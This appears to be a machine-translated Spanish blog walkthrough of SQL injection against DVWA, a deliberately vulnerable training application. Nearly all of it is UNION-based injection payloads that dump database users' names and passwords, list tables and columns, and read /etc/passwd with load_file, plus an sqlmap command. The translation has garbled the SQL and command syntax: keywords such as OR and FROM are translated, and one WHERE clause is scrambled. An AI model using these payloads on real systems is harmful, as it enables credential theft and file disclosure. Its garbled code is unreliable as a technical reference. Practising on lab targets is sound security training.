HOWTO: DVWA SQL Injection

nivel Seguridad = Baja

99 o 1 = 1
– mostrará todos los registros

99 o 1 = 1 union select 1,2,3
– mostrará «Las sentencias SELECT utilizadas tienen un número diferente de columnas» mensaje de error

99 o 1 = 1 union select 1,2
– ningún mensaje de error pero mostrar todos los registros

99 o 1 = 1 union select null, null
– ningún mensaje de error pero mostrar todos los registros

99 o 1 = 1 union select version (), base de datos ()
– se mostrará la versión de MySQL y el nombre de base de datos – DVWA

99 o 1 = 1 union select null, el usuario ()
o
99 o 1 = 1 union select user (), null
– mostrará al usuario actual de la base de datos

99 o 1 = 1 union select nulo, nombre_tabla de INFORMATION_SCHEMA . tablas
– Se muestran todos los nombres de tabla

99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde donde INFORMATION_SCHEMA.COLUMNS nombre_tabla = 'users'
– se mostrará la lista de columnas de tabla de usuarios

99 o 1 = 1 union select null, concat (first_name, 0x0a, password) de usuarios
– que estamos buscando first_name tabla de usuarios y contraseña

99 o 1 = 1 union select null, @ @ datadir
– mostrará el directorio mysql

99 o 1 = 1 union select todo nulo, load_file ('/ etc / passwd')
– mostrará el contenido de / etc / passwd

Nivel de seguridad = medio

99 o 1 = 1
– mostrará todos los registros

99 o 1 = 1 union select 1,2,3
– mostrará «Las sentencias SELECT utilizadas tienen un número diferente de columnas» error mensaje

99 o 1 = 1 union select 1,2
– ningún mensaje de error pero mostrar todos los registros

99 o 1 = 1 union select null, null
– ningún mensaje de error pero mostrar todos los registros

99 o 1 = 1 union select version (), base de datos ()
– se mostrará la versión de MySQL y el nombre de base de datos – DVWA

99 o 1 = 1 union select null, el usuario ()
o
99 o 1 = 1 union select user (), null
– mostrará al usuario actual de la base de datos

99 o 1 = 1 union select nulo, nombre_tabla de INFORMATION_SCHEMA.TABLES
– Se muestran todos los nombres de tabla

99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde INFORMATION_SCHEMA.COLUMNS
– desde donde no se puede utilizar la cláusula, todo nombre de la columna debe aparecer

o

99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde INFORMATION_SCHEMA.COLUMNS donde nombre_tabla = 0x7573657273
– donde 0x7573657273 es el valor hexadecimal de «usuarios»

99 o 1 = 1 union select null, concat (first_name, 0x0a, password) de los usuarios
– que estamos buscando first_name tabla de usuarios y contraseña

99 o 1 = 1 union select null, @ @ datadir
– mostrará el directorio mysql

sqlmap para la Seguridad = Baja

/ sqlmap.py-u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit #" - cookies = "security = bajo;. PHPSESSID = rc1vt2hcper8nlpau9mh2v4304 "- string =" Apellido "-T usuarios - columnas

En Seguridad = medio es similar

Eso es todo.! ¡Hasta luego!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *